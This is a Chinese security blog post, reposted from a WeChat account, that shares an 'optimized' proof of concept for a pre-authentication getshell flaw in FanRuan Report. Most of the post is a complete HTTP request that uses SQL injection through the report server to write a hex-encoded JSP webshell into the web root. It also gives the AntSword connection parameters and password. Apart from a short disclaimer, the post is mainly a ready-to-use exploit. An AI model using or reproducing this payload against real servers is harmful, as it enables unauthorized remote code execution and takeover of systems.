前言
昨天看到各个地方都在发帆软的漏洞,看到poc后发现利用姿势应该是之前就有的,并且网上传的poc是写绝对路径,其实传相对路径就可以getshell。所以我们就对poc进行了一些小小的优化:
1、相对路径写入,可利用的环境更广,可无视系统和版本写入。
2、payload较短,直接蚁剑利用。
漏洞复现
漏洞原理y4tacker师傅也在自己的博客做了分享:https://y4tacker.github.io/2024/07/23/year/2024/7/某软Report高版本中利用的一些细节/
我们这边主要对优化后poc进行分享。
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1Host:Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: keep-alive
发送漏洞poc
漏洞利用成果后,写入文件为/webroot/aaa.jsp
可以利用蚁剑进行连接,添加get参数?a=javax.script.ScriptEngineManager,蚁剑连接密码为b,连接类型选择JSPJS
原文始发于微信公众号(良月安全):[漏洞复现]最新帆软前台getshell漏洞及优化poc分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论